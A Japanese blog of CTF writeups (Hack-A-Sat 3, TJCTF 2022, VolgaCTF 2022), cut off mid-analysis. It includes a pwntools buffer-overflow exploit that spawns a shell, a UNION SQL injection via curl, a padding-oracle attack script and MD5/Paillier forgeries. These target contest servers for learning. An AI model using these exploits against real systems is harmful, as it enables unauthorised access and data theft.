Hack-A-Sat 3 Qualifiers Writeup

CTF writeup

この大会は2022/5/21 23:00(JST)～2022/5/23 5:00(JST)に開催されました。
今回もチームで参戦。結果は78点で472チーム中135位でした。
自分で解けた問題をWriteupとして書いておきます。

Juggernaut (The Danger Room)

添付ファイルを展開していくと、flag.txtにフラグが書いてあった。

flag{zulu755588india3:GJ7J0TCLtksQ2Nk7k1M8yzysSeYjUm22ANfuvZ2vE8c9TDpUTKFOno-PD2TY79qvCPDC3Sjl2bz3pTPwy0Pj6as}

Magneto (The Danger Room)

$ nc basic_service.satellitesabove.me 5300
Ticket please:
ticket{foxtrot210994sierra3:GN1rRGpTIB2STuLTKTYEfEqF1zLifSP-h9DkYfZqGTkpy3GZEU8dSsKt5JkcDYbyUg}
Type 'HACK A SAT' to get the flag: HACK A SAT
You got it! Here's your flag:
flag{foxtrot210994sierra3:GJaEXoLXOL3KpMYjRqBszF2_Iw8_uVK49YCMzWNhujn5eRvf3rISif6GL9p9pgm2fyhwH8268ksR4whc7r8AZKU}

flag{foxtrot210994sierra3:GJaEXoLXOL3KpMYjRqBszF2_Iw8_uVK49YCMzWNhujn5eRvf3rISif6GL9p9pgm2fyhwH8268ksR4whc7r8AZKU}

Prof. X (The Danger Room)

$ nc basic_handoff.satellitesabove.me 5300
Ticket please:
ticket{india895353sierra3:GE5TjmHjr4rYQSDrx26u1tUfWpZTehO2SjdE6Fex7i8ImQZmn3qngkhDG5TgWGcHOA}
Math problem available at: http://44.199.216.48:26091/math
What is the solution to the math problem?

http://44.199.216.48:26091/mathにアクセスしたら、以下のように表示される。

solve: 123 + 456

計算結果の579を答えればよい。

$ nc basic_handoff.satellitesabove.me 5300
Ticket please:
ticket{india895353sierra3:GE5TjmHjr4rYQSDrx26u1tUfWpZTehO2SjdE6Fex7i8ImQZmn3qngkhDG5TgWGcHOA}
Math problem available at: http://44.199.216.48:26091/math
What is the solution to the math problem?
579
Here is your flag
flag{india895353sierra3:GDFS5iwANFDuWFhOr5B4RlFyWkWNIrTHiji9ImLKR8fmvNj5xQJF6zMG_9BaW9bDgrNOedp8Ekgx1L8g6scaFkU}

flag{india895353sierra3:GDFS5iwANFDuWFhOr5B4RlFyWkWNIrTHiji9ImLKR8fmvNj5xQJF6zMG_9BaW9bDgrNOedp8Ekgx1L8g6scaFkU}

2022-05-19

TJCTF 2022 Writeup

CTF writeup

この大会は2022/5/14 8:00(JST)～2022/5/16 8:00(JST)に開催されました。
今回もチームで参戦。結果は5557点で768チーム中14位でした。
自分で解けた問題をWriteupとして書いておきます。

twist-cord (misc)

Discordに入り、#announcementsチャネルのメッセージを見ると、フラグの前半が書いてある。

tjctf{please_enjoy

Twitterの方を見てみると、フラグの後半が書いてある。

_b6fd3b11fc5393c8}

tjctf{please_enjoy_b6fd3b11fc5393c8}

lamb-sauce (web)

HTMLソースを見ると、コメントに以下のように書いてある。

<!-- <a href="/flag-9291f0c1-0feb-40aa-af3c-d61031fd9896.txt"> is it here? </a> -->

https://lamb-sauce.tjc.tf/flag-9291f0c1-0feb-40aa-af3c-d61031fd9896.txtにアクセスすると、フラグが表示された。

tjctf{idk_man_but_here's_a_flag_462c964f0a177541}

fake-geoguessr (forensics)

$ exiftool lake.jpg 
　　　　：
Copyright                       : tjctf{thats_a_
　　　　：
Current IPTC Digest             : b443520a10119da99c2550175e6d0efb
Envelope Record Version         : 4
Coded Character Set             : UTF8
Application Record Version      : 4
IPTC Digest                     : b443520a10119da99c2550175e6d0efb
Comment                         : lot_of_metadata}
Image Width                     : 3264
Image Height                    : 2448
　　　　：

Copyrightにフラグの前半、Commentにフラグの後半が設定されていた。

tjctf{thats_a_lot_of_metadata}

cool-school (forensics)

StegSolveで開き、Gray bitsを見ると、フラグが現れる。

tjctf{l0l_st3g_s0_co0l}

rsa-apprentice (crypto)

nを素因数分解する。

n = 1033247481589406269253 * 1177043968824330681533

あとは通常通りc1とc2について復号し、文字列化したものを結合する。

#!/usr/bin/env python3
from Crypto.Util.number import *

n = 1216177716507739302616478655910148392804849
e = 65537
c1 = 257733734393970582988408159581244878149116
c2 = 843105902970788695411197846605744081831851

p = 1033247481589406269253
q = 1177043968824330681533
assert n == p * q

phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m1 = pow(c1, d, n)
m2 = pow(c2, d, n)

flag = (long_to_bytes(m1) + long_to_bytes(m2)).decode()
print(flag)

tjctf{n0t_s0_S3cur3_Cryp70}

flimsy-fingered-latin-teacher (crypto)

Dellのキーボードのキーレイアウトで左にシフトする。
以下の商品のキーレイアウトを参考にする。

https://www.u-buy.jp/jp/product/1YXNN9Y-dell-oem-genuine-usb-104-key-black-wired-keyboard-rh659-l100-sk-8115

ykvyg}pp[djp,rtpelru[pdoyopm|
　　　　↓
tjctf{oopshomerowkeyposition}

tjctf{oopshomerowkeyposition}

spongebob (forensics)

バイナリエディタでPNGのIHDRチャンクの高さを大きくすると、4コマ目にフラグが現れた。

tjctf{such_pogg3rs_ctf}

take-a-l (rev)

Ghidraでデコンパイルする。

undefined8 main(void)

{
  size_t sVar1;
  undefined8 uVar2;
  long in_FS_OFFSET;
  ulong local_68;
  byte local_58 [72];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  puts("What\'s your flag?");
  fgets((char *)local_58,0x40,stdin);
  sVar1 = strlen((char *)local_58);
  if (sVar1 == 0x1a) {
    for (local_68 = 0; local_68 < 0x19; local_68 = local_68 + 1) {
      if (((&flag)[local_68] ^ local_58[local_68]) != 0x12) {
        puts("L");
        uVar2 = 1;
        goto LAB_00101278;
      }
    }
    puts("W");
    uVar2 = 0;
  }
  else {
    puts("L");
    uVar2 = 1;
  }
LAB_00101278:
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return uVar2;
}

                             flag                                            XREF[3]:     Entry Point(*), main:0010122e(*), 
                                                                                          main:0010123c(R)  
        00102010 66              ??         66h    f
        00102011 78              ??         78h    x
        00102012 71              ??         71h    q
        00102013 66              ??         66h    f
        00102014 74              ??         74h    t
        00102015 69              ??         69h    i
        00102016 75              ??         75h    u
        00102017 75              ??         75h    u
        00102018 75              ??         75h    u
        00102019 73              ??         73h    s
        0010201a 7f              ??         7Fh    
        0010201b 77 60 61        ds         "w`aaaaaaaaa'ao"
                 61 61 61 
                 61 61 61

フラグの各文字のASCIIコードと0x12のXORが上記のflagの各値になる。

#!/usr/bin/env python3

with open('chall', 'rb') as f:
    enc = f.read()[0x2010:0x2010+0x1a-1]

flag = ''
for c in enc:
    flag += chr(c ^ 0x12)
print(flag)

tjctf{gggamersssssssss5s}

vacation-1 (pwn)

$ file chall
chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2e3698583da34ac3bed68f505121c5311ef408c9, for GNU/Linux 3.2.0, not stripped

$ checksec.sh --file chall
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    Not an ELF file   No RPATH   No RUNPATH   chall

BOFでshell_land関数をコールすればよい。

$ gdb -q ./chall
Reading symbols from ./chall...(no debugging symbols found)...done.
gdb-peda$ pattc 50
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA'
gdb-peda$ r
Starting program: /mnt/hgfs/Shared/chall 
Where am I going today?
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA

Program received signal SIGSEGV, Segmentation fault.







[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffdde0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA\n")
RBX: 0x0 
RCX: 0x1f 
RDX: 0x7ffff7dcf8d0 --> 0x0 
RSI: 0x7fffffffdde0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA\n")
RDI: 0x7fffffffdde1 ("AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA\n")
RBP: 0x41412d4141434141 ('AACAA-AA')
RSP: 0x7fffffffddf8 ("(AADAA;AA)AAEAAaAA0AAFAAbA\n")
RIP: 0x4011df (<vacation+50>:	ret)
R8 : 0x405293 --> 0x0 
R9 : 0x7ffff7fde4c0 (0x00007ffff7fde4c0)
R10: 0x405010 --> 0x0 
R11: 0x246 
R12: 0x4010b0 (<_start>:	endbr64)
R13: 0x7fffffffdee0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4011d8 <vacation+43>:	call   0x4010a0 <fgets@plt>
   0x4011dd <vacation+48>:	nop
   0x4011de <vacation+49>:	leave  
=> 0x4011df <vacation+50>:	ret    
   0x4011e0 <main>:	endbr64 
   0x4011e4 <main+4>:	push   rbp
   0x4011e5 <main+5>:	mov    rbp,rsp
   0x4011e8 <main+8>:	
    mov    rax,QWORD PTR [rip+0x2e61]        # 0x404050 <stdout@@GLIBC_2.2.5>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffddf8 ("(AADAA;AA)AAEAAaAA0AAFAAbA\n")
0008| 0x7fffffffde00 ("A)AAEAAaAA0AAFAAbA\n")
0016| 0x7fffffffde08 ("AA0AAFAAbA\n")
0024| 0x7fffffffde10 --> 0xa4162 ('bA\n')
0032| 0x7fffffffde18 --> 0x7fffffffdee8 --> 0x7fffffffe23e ("/mnt/hgfs/Shared/chall")
0040| 0x7fffffffde20 --> 0x100008000 
0048| 0x7fffffffde28 --> 0x4011e0 (<main>:	endbr64)
0056| 0x7fffffffde30 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004011df in vacation ()
gdb-peda$ patto (AADAA;AA)AAEAAaAA0AAFAAbA
(AADAA;AA)AAEAAaAA0AAFAAbA found at offset: 24

$ ROPgadget --binary chall | grep ": ret"
0x000000000040101a : ret

#!/usr/bin/env python3
from pwn import *

if len(sys.argv) == 1:
    p = remote('tjc.tf', 31680)
else:
    p = process('./chall')

elf = ELF('./chall')

ret_addr = 0x40101a
shell_land_addr = elf.symbols['shell_land']

payload = b'A' * 24
payload += p64(ret_addr)
payload += p64(shell_land_addr)

data = p.recvline().rstrip().decode()
print(data)
print(payload)
p.sendline(payload)
p.interactive()

実行結果は以下の通り。

[+] Opening connection to tjc.tf on port 31680: Done
[*] '/mnt/hgfs/Shared/chall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
Where am I going today?
b'AAAAAAAAAAAAAAAAAAAAAAAA\x1a\x10@\x00\x00\x00\x00\x00\x96\x11@\x00\x00\x00\x00\x00'
[*] Switching to interactive mode
$ ls
flag.txt
run
$ cat flag.txt
tjctf{wh4t_a_n1c3_plac3_ind33d!_7609d40aeba4844c}

tjctf{wh4t_a_n1c3_plac3_ind33d!_7609d40aeba4844c}

game-leaderboard (web)

profile_idがわからないので、SQLインジェクションで取り出す。

$ curl https://game-leaderboard.tjc.tf/ -d 'filter=100 union select profile_id, profile_id, name FROM leaderboard'
<!DOCTYPE >
<html>
	<head>
        <meta charset="utf-8">
        <title>Leaderboard</title>
        <link href="/styles.css" rel="stylesheet">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
    </head>
	<body class="min-h-full flex flex-col">
		<div class="px-4 py-2 flex flex-col flex-grow items-center">
            <div class="w-full md:w-1/2">
                <div class="font-bold text-4xl text-center mb-4">
                    Leaderboard
                </div>
                <div class="mb-3 flex flex-row">
                    <div class="w-3/4">
                        <form action="/" method="POST">
                            <label for="filter-input">Filter:</label>
                            <input type="number" id="filter-input" name="filter" class="border border-black" autocomplete="off" >
                            <input type="Submit" value="Submit" class="border border-black px-2">
                        </form>
                    </div>
                </div>
                <table class="w-full">
                    <thead class="font-bold">
                        <td>#</td>
                        <td>Name</td>
                        <td class="text-center">Score</td>
                    </thead>
                    <tbody id="table-body">
                        
                        <tr>
                            <td>1</td>
                            <td>cd09e81388481564</td>
                            <td class="text-center">superandypancake</td>
                        </tr>
                        
                        <tr>
                            <td>2</td>
                            <td>2079e3c533c66de9</td>
                            <td class="text-center">redfrog</td>
                        </tr>
                        
                        <tr>
                            <td>3</td>
                            <td>7ce961eb790a07fd</td>
                            <td class="text-center">g_gamer</td>
                        </tr>
                        
                        <tr>
                            <td>4</td>
                            <td>8d27b182818c41fd</td>
                            <td class="text-center">dn</td>
                        </tr>
                        
                        <tr>
                            <td>5</td>
                            <td>445394d1f3a48394</td>
                            <td class="text-center">Super A. Austin</td>
                        </tr>
                        
                    </tbody>
                </table>
            </div>
        </div>
    </body>
</html>

rank 1 の dnユーザのユーザIDは 8d27b182818c41fd であるとわかった。

$ curl https://game-leaderboard.tjc.tf/user/8d27b182818c41fd
<!DOCTYPE >
<html>
	<head>
        <meta charset="utf-8">
        <title>User Information</title>
        <link href="/styles.css" rel="stylesheet">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
    </head>
	<body class="min-h-full flex flex-col">
		<div class="px-4 py-2 flex flex-col flex-grow items-center">
            
            <div class="w-full md:w-1/2">
                <div class="font-bold text-4xl text-center mb-4">
                    Profile Page
                </div>
                <div>
                    <div class="text-2xl">
                        <b>User:</b>
                        dn
                    </div>
                    <div class="text-xl">
                        <b>Score:</b>
                        63
                    </div>
                    <div class="text-lg mb-3">
                        You are rank 1 out of 5.
                    </div>
                    <div>
                        tjctf{h3llo_w1nn3r_0r_4re_y0u?}
                    </div>
                    <div>
                        <a href="/" class="text-blue-700 underline">Return to Leaderboard</a>
                    </div>
                </div>
            </div>
            
        </div>
    </body>
</html>

tjctf{h3llo_w1nn3r_0r_4re_y0u?}

morph-master (crypto)

サーバの処理概要は以下の通り。

・N = 1024
・p, q: Nビット素数
・n = p * q
・s = n ** 2
・λ = (p - 1) * (q - 1) // GCD(p - 1, q - 1)
・g: 1以上s未満ランダム整数
・L(x) = (x - 1) // n
・μ = pow(L(pow(g, λ, s)), -1, n)
・nを表示
・encrypt(4)を表示
・c: 数値入力
・m = decrypt(c)
・long_to_bytes(m) == b"Please give me the flag"の場合、フラグを表示

Paillier暗号のようだ。加法準同型性の特性を使って解く。目的の平文の数値は7703033469609239351985350025414201079417630703156486503。

7703033469609239351985350025414201079417630703156486503
= 4 + 4 + ... + 4 + 3

4の倍数にしたいので、sを何回かプラスする。sは必ず4で割った余りは1なので、1回プラスすればよい。

E(7703033469609239351985350025414201079417630703156486503)
= E(7703033469609239351985350025414201079417630703156486503 + s)
= E(4) * E(4) * ... * E(4) * E(4) % s
= pow(E(4), count, s)

#!/usr/bin/env python3
import socket
from Crypto.Util.number import *

def recvuntil(s, tail):
    data = b''
    while True:
        if tail in data:
            return data.decode()
        data += s.recv(1)

target = bytes_to_long(b"Please give me the flag")
print('[+] target:', target)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('tjc.tf', 31996))

data = recvuntil(sock, b'\n').rstrip()
print(data)
n = int(data.split('(')[-1].split(',')[0])
s = n ** 2
assert s % 4 == 1

data = recvuntil(sock, b'\n').rstrip()
print(data)
e_4 = int(data.split(' ')[-1])

assert (target + s) % 4 == 0
count = (target + s) // 4
c = pow(e_4, count, s)

data = recvuntil(sock, b':\n').rstrip()
print(data)
print(c)
sock.sendall(str(c).encode() + b'\n')
data = recvuntil(sock, b'\n').rstrip()
print(data)
data = recvuntil(sock, b'\n').rstrip()
print(data)

実行結果は以下の通り。

[+] target: 7703033469609239351985350025414201079417630703156486503
public key (n, g) = (23356427598445943771486889459897859564703708676241408366278213136210132223593795569808177874877593274317362903036596063251724976154699574516019212254613012243316329076141630367496462146851952416405455050375136692177269204537733728947788538186951274669216160978929564188598976487197824334342781271702829009872334248633205557709498246586485917969706242497831002607134790885879464161894929297041644070008044080498082054303082075446099617217628740775628517596245815562226492617616367712996123578001842459568009145585227189143088217055813812608664615355151511599495979536918857047827717135505904055389547818746021837303437, ?)
E(4) = 427079017876072702071646694690101438218316096228100154530028171213966011717918602215179027021639092651693225616278304932041250411005915610241140005737951044326128724383157074385173721641961569196091454749078956261971184235165294758556174566494167363937992047056431408859594058312010895581723212661831332212987947534410821638047570224690285293911555835091820894581115884277075355053180089180944977364566078685910011473278529813736598250131848412301341632094657987221890495863350775886839493164644200087795566260429344382921316663799767476303157900455297863009042689970592043206729668650925371572519564675626450387002479179509807042478418181442693030201331159847665709026233464027940341885081652793696422990138984010905372054788868051550652539247940009431353488406299755461602074349367713273175229834371380338388813562604408964581888340332434718940110997928741092776372380796264393932028240232352226549922865084621771187957252035255216116847294245050403087478682595399692234961683068732968555017779404999459260761861874496970221466554638818189887176939000289370913139325987105056222853863002534743261660392881897654097033887175102382993864316449257353381954758659988915434941001577865838897494791018970281174281883769499378548433483357

Encrypt 'Please give me the flag' for your flag:
183629716004917738319798152310571908033728299675855124053762417524532831323859135399290648158162050065252264943241824527466829680289195571969935522410223320010224384693148194285661671280125555744545168766704755553886087432957101013488715109819032501570619447551851104455302677704297374980075895733329831859887470694571486374000454366931932917094365735570604501793891651116034270898748628851365284582836483130210788418517848529812718866831219432585636338220718231015266722219234713123508567987017580926116410395772053363943224590504671445024230982828618403914978591549517394663741950477553508955910555407876842626764909663202299274968483035072208724588229818618550816976387958567817423143816166905763028846033146704506116536661103477749183765051382480490095225380303393684693014194427905693905047552758310182108393890219293133086545639894755570484450796805658207440780665597912391156070615640002976605260445449135529613693933242231535860842175132594164238282969687620824962689243283569647623183416761078847612125322822017545314368168198562543917598460516940765998861701601254585407337333338265483512262184968572066542960948067844765520968928083750899590657353521409116815234770552792318684914518554950223434697385950622895384017159530
Okay!
tjctf{M0rph1Ng_1S_pr3t7y_c0ol_1snt_it?}

tjctf{M0rph1Ng_1S_pr3t7y_c0ol_1snt_it?}

mac-master (crypto)

サーバの処理概要は以下の通り。

・QUERIED: 空集合
・KEY: ランダム16バイト
・以下繰り返し
　・メニュー選択
　・1を選択した場合
　　・hex_message: 16進数文字列入力
　　・message: hex_messageのhexデコード
　　・QUERIEDにmessage追加
　　・Tag(=nmac(message))表示
　　　・message + KEYのmd5ダイジェスト(hex)
　・2を選択した場合
　　・hex_message: 16進数文字列入力
　　・tag: Tag入力
　　・message: hex_messageのhexデコード
　　・QUERIEDにmessageがある場合、該当メッセージを表示する。
　　・QUERIEDにmessageがなく、nmac(message) == tagの場合、フラグを表示

MD5の衝突の問題。衝突するファイルを作成する。

$ echo -n base > base
$ ./clone-fastcoll/fastcoll base
Generating first block: ....
Generating second block: S10...
use 'md5sum md5_data*' check MD5
$ md5sum md5_data1
74ccb68f8b2a9ced205e8685875624ed  md5_data1
$ md5sum md5_data2
74ccb68f8b2a9ced205e8685875624ed  md5_data2
$ sha1sum md5_data1
6af160c6047faaaffa11f82497a2592e6f50e407  md5_data1
$ sha1sum md5_data2
11c0ee3d6e70c737c4e7751daa14373ed7874f20  md5_data2

あとはこのデータを使えば、後ろに同じデータが結合されてもMD5は同じになるので、フラグが得られる。

#!/usr/bin/env python3
import socket

def recvuntil(s, tail):
    data = b''
    while True:
        if tail in data:
            return data.decode()
        data += s.recv(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('tjc.tf', 31415))

for _ in range(5):
    data = recvuntil(s, b'\n').rstrip()
    print(data)

with open('md5_data1', 'rb') as f:
    hex_message1 = f.read().hex()

with open('md5_data2', 'rb') as f:
    hex_message2 = f.read().hex()

#### get the tag ####
data = recvuntil(s, b'Challenge\n').rstrip()
print(data)
print('1')
s.sendall(b'1\n')
data = recvuntil(s, b':\n').rstrip()
print(data)
print(hex_message1)
s.sendall(hex_message1.encode() + b'\n')
data = recvuntil(s, b'\n').rstrip()
print(data)
tag = data.split(' ')[-1]

#### challenge ####
data = recvuntil(s, b'Challenge\n').rstrip()
print(data)
print('2')
s.sendall(b'2\n')
data = recvuntil(s, b':\n').rstrip()
print(data)
print(hex_message2)
s.sendall(hex_message2.encode() + b'\n')
data = recvuntil(s, b': ')
print(data + tag)
s.sendall(tag.encode() + b'\n')
for _ in range(2):
    data = recvuntil(s, b'\n').rstrip()
    print(data)

実行結果は以下の通り。

Introducing Neil-MAC (NMAC), the future of hash-based message
authentication codes!

No longer susceptible to those pesky length extension attacks!

What do you want to do?
1) Query a message
2) Challenge
1
What message would you like to query a tag for?
Enter message hex-encoded:
62617365000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000db5484df119098166af7c03d9e677d1b9ab08eb4fc1f21e8233a3b8a5744ba53ecbbf9e46ac389da872477e1943b3942b39e7b0b2efb0d2deb8431c50193c49140908cdf61796a8a713004fbe867f10317c486536c5e22298bb340682b60a8c7cf6b3818a786325ef7024e5b6d5f16535d0aaa134135641b1cc7e1d583a108d9
Tag: 29c7dd18f5d6df85ebcfbcdcb47ec983
What do you want to do?
1) Query a message
2) Challenge
2
Challenge time!
Enter message hex-encoded:
62617365000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000db5484df119098166af7c03d9e677d1b9ab08e34fc1f21e8233a3b8a5744ba53ecbbf9e46ac389da872477e194bb3942b39e7b0b2efb0d2deb8431450193c49140908cdf61796a8a713004fbe867f10317c486d36c5e22298bb340682b60a8c7cf6b3818a786325ef7024e5b6ddf15535d0aaa134135641b1cc7e15583a108d9
Tag: 29c7dd18f5d6df85ebcfbcdcb47ec983
Nice job!
Flag: tjctf{i_pr0baBly_sh0Uldnt_r0LL_my_0wn_M4CS}

tjctf{i_pr0baBly_sh0Uldnt_r0LL_my_0wn_M4CS}

7sckp (crypto)

$ nc tjc.tf 31566
Hi! Welcome to our oracle, now extra secure because of our custom padding!
We have this really cool secret here: 79141cb410cc95136c9c354e88e3891b62b621a4d3a7e5f3f8fecf02e444993e41e15c4a6a4a6cb4ca6ae0fd1b749481
Ciphertext:

AES CBC Padding Oracle Attackの応用問題。パディングの方法が異なるので、その方法に合わせて、チェックを行う。

#!/usr/bin/env python3
import socket
import random
from time import time
from Crypto.Cipher import AES
from Crypto.Util.strxor import strxor

def recvuntil(s, tail):
    data = b''
    while True:
        if tail in data:
            return data.decode()
        data += s.recv(1)

def pad(msg, block_size):
    random.seed(seed)
    p = b''
    pad_len = block_size - (len(msg) % block_size)
    while len(p) < pad_len:
        b = bytes([random.randrange(256)])
        if b not in p:
            p += b

    return msg + p

def unpad(msg, block_size):
    random.seed(seed)
    p = b''
    while len(p) < block_size:
        b = bytes([random.randrange(256)])
        if b not in p:
            p += b

    if p[0] not in msg:
        raise ValueError('Bad padding')

    pad_start = msg.rindex(p[0])
    if msg[pad_start:] != p[:len(msg) - pad_start]:
        raise ValueError('Bad padding')

    return msg[:pad_start]

def is_valid(s, ct):
    data = recvuntil(s, b': ')
    print(data + ct)
    s.sendall(ct.encode() + b'\n')
    data = recvuntil(s, b'\n').rstrip()
    print(data)
    if data == 'ok':
        return True
    else:
        return False

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('tjc.tf', 31566))

data = recvuntil(s, b'\n').rstrip()
print(data)
seed = int(time() // 10)
data = recvuntil(s, b'\n').rstrip()
print(data)

ct = bytes.fromhex(data.split(' ')[-1])
ct_blocks = [ct[i:i+16] for i in range(0, len(ct), 16)]

padding = pad(b'', AES.block_size)

xor_blocks = []
for i in range(1, len(ct_blocks)):
    xor_block = b''
    for j in range(16):
        for code in range(256):
            print('[+] %d - %d - %d: %s' % (i, j, code, xor_block.hex()))
            if j > 0:
                print('****', strxor(xor_block, ct_blocks[i-1][-j:]), '****')
            try_pre_block = b'\x00' * (16 - j - 1) + bytes([code]) + strxor(xor_block, padding[1:j + 1])
            try_cipher = (try_pre_block + ct_blocks[i]).hex()
            if is_valid(s, try_cipher):
                xor_code = padding[0] ^ code
                xor_block = bytes([xor_code]) + xor_block
                break

    xor_blocks.append(xor_block)

flag = b''
for i in range(len(xor_blocks)):
    flag += strxor(ct_blocks[i], xor_blocks[i])

flag = unpad(flag, AES.block_size).decode()
print('[*] flag:', flag)

実行結果は以下の通り。

Hi! Welcome to our oracle, now extra secure because of our custom padding!
We have this really cool secret here: da74328b501e5a7ba8925402ce5fa86e598a1d437accdc4d9dee5456eb2134951b27624f9133d5e57f9fad2223d0b8bd
[+] 1 - 0 - 0: 
Ciphertext: 00000000000000000000000000000000598a1d437accdc4d9dee5456eb213495
error!!!
[+] 1 - 0 - 1: 

Ciphertext: 00000000000000000000000000000001598a1d437accdc4d9dee5456eb213495
error!!!
[+] 1 - 0 - 2: 

Ciphertext: 00000000000000000000000000000002598a1d437accdc4d9dee5456eb213495
error!!!
[+] 1 - 0 - 3: 

Ciphertext: 00000000000000000000000000000003598a1d437accdc4d9dee5456eb213495
error!!!
[+] 1 - 0 - 4: 

Ciphertext: 00000000000000000000000000000004598a1d437accdc4d9dee5456eb213495
error!!!
　　　　　　　　　　　　　　　　：
　　　　　　　　　　　　　　　　：
[+] 2 - 15 - 34: bb532425fbbe7fa9de6167895c7d9c
**** b'1Ng_7b24051b}I\t' ****

Ciphertext: 22b2e012d5ea2c19a488565874c6d4b91b27624f9133d5e57f9fad2223d0b8bd
error!!!
[+] 2 - 15 - 35: bb532425fbbe7fa9de6167895c7d9c
**** b'1Ng_7b24051b}I\t' ****

Ciphertext: 23b2e012d5ea2c19a488565874c6d4b91b27624f9133d5e57f9fad2223d0b8bd
error!!!
[+] 2 - 15 - 36: bb532425fbbe7fa9de6167895c7d9c
**** b'1Ng_7b24051b}I\t' ****

Ciphertext: 24b2e012d5ea2c19a488565874c6d4b91b27624f9133d5e57f9fad2223d0b8bd
error!!!
[+] 2 - 15 - 37: bb532425fbbe7fa9de6167895c7d9c
**** b'1Ng_7b24051b}I\t' ****

Ciphertext: 25b2e012d5ea2c19a488565874c6d4b91b27624f9133d5e57f9fad2223d0b8bd
ok
[*] flag: tjctf{r4nd0m_p4d51Ng_7b24051b}

tjctf{r4nd0m_p4d51Ng_7b24051b}

2022-05-18

VolgaCTF 2022 Qualifier Writeup

CTF writeup

この大会は2022/5/15 0:00(JST)～2022/5/16 0:00(JST)に開催されました。
今回もチームで参戦。結果は352点で176チーム中82位でした。
自分で解けた問題をWriteupとして書いておきます。

Find the flag (misc)

ブラウザのタイトルにURL表示の他に1文字が次々に表示される。文字を追うのはきついので、HTMLソースを見て、リンクされているjsを見ていく。
http://flag-title.q.2022.volgactf.ru:3000/_next/static/chunks/pageindex-f6df80d9480f611f.jsにbase64文字列が含まれているので、デコードしていく。

$ echo 4oCcV2lubmluZyBpZ25pdGVzIGEgc2VsZi1jb25zY2lvdXMgYXdhcmVuZXNzIHRoYXQgb3RoZXJzIGFyZSA= | base64 -d
“Winning ignites a self-conscious awareness that others are 

$ echo d2F0Y2hpbmcuIEl04oCZcyBhIGxvdCBlYXNpZXIgdG8gbW92ZSB1bmRlciB0aGUgcmFkYXIgd2hlbiBubyBvbmU= | base64 -d
watching. It’s a lot easier to move under the radar when no one

$ echo d2F0Y2hpbmcuIEl04oCZcyBhIGxvdCBlYXNpZXIgdG8gbW92ZSB1bmRlciB0aGUgcmFkYXIgd2hlbiBubyBvbmU= | base64 -d
watching. It’s a lot easier to move under the radar when no one

$ echo YmUgcm91Z2ggYW5kIGdldCBkaXJ0eSBiZWNhdXNlIG5vIG9uZSBldmVuIGtub3dzIHlvdeKAmXJlIHRoZXJlLiA= | base64 -d
be rough and get dirty because no one even knows you’re there.

$ echo QnV0IGFzIHNvb24gYXMgeW91IHN0YXJ0IHRvIHdpbiwgYW5kIG90aGVycyBzdGFydCB0byBub3RpY2UsIHlvdeKAmXJl | base64 -d
But as soon as you start to win, and others start to notice, you’re

$ echo c3VkZGVubHkgYXdhcmUgdGhhdCB5b3XigJlyZSBiZWluZyBvYnNlcnZlZC4gWW914oCZcmUgYmVpbmcganVkZ2VkLiA= | base64 -d
suddenly aware that you’re being observed. You’re being judged.

$ echo WW91IHdvcnJ5IHRoYXQgb3RoZXJzIHdpbGwgZGlzY292ZXIgeW91ciBmbGF3cyBhbmQgd2Vha25lc3Nlcyw= | base64 -d
You worry that others will discover your flaws and weaknesses,

$ echo YW5kIHlvdSBzdGFydCBoaWRpbmcgeW91ciB0cnVlIHBlcnNvbmFsaXR5LCBzbyB5b3UgY2FuIGJlIGEgZ29vZCA= | base64 -d
and you start hiding your true personality, so you can be a good 

$ echo cm9sZSBtb2RlbCBhbmQgZ29vZCBjaXRpemVuIGFuZCBWb2xnYUNURntEWU40TTFDXzcxN0wz | base64 -d
role model and good citizen and VolgaCTF{DYN4M1C_717L3

$ echo X1IzNEM3XzQ4MzF9IGEgbGVhZGVyIHRoYXQgb3RoZXJzIGNhbiByZXNwZWN0LiBUaGVyZSBpcyBub3RoaW5n | base64 -d
_R34C7_4831} a leader that others can respect. There is nothing

　　　　　　　　　　　　　　　　　：

フラグが現れた。

VolgaCTF{DYN4M1C_717L3_R34C7_4831}

Poem (crypto)

暗号処理の概要は以下の通り。

・generator = LCG(a, b, m, x0)
　LCGパラメータ設定(各パラメータ不明)
・cipertext = b''
・poem.txtの各行について以下を実行
　・iv: generator.get_byte()の結果を16回結合
　　・x0 = (a * x0 + b) % m
　・key: generator.get_byte()の結果を16回結合
　　・x0 = (a * x0 + b) % m
　・ct_block = encrypt(key, iv, line.strip().encode())
　　・plaintext: "\x00"でパディング
　　・ctr: keyでivをAES-ECB暗号化
　　・ctr_int: ctrの数値化
　　・pt_blocks: plaintextの16バイトのブロック配列
　　・pt_blocksの各ブロックについて以下を実行
　　　・block_int: ブロックの文字列の数値化
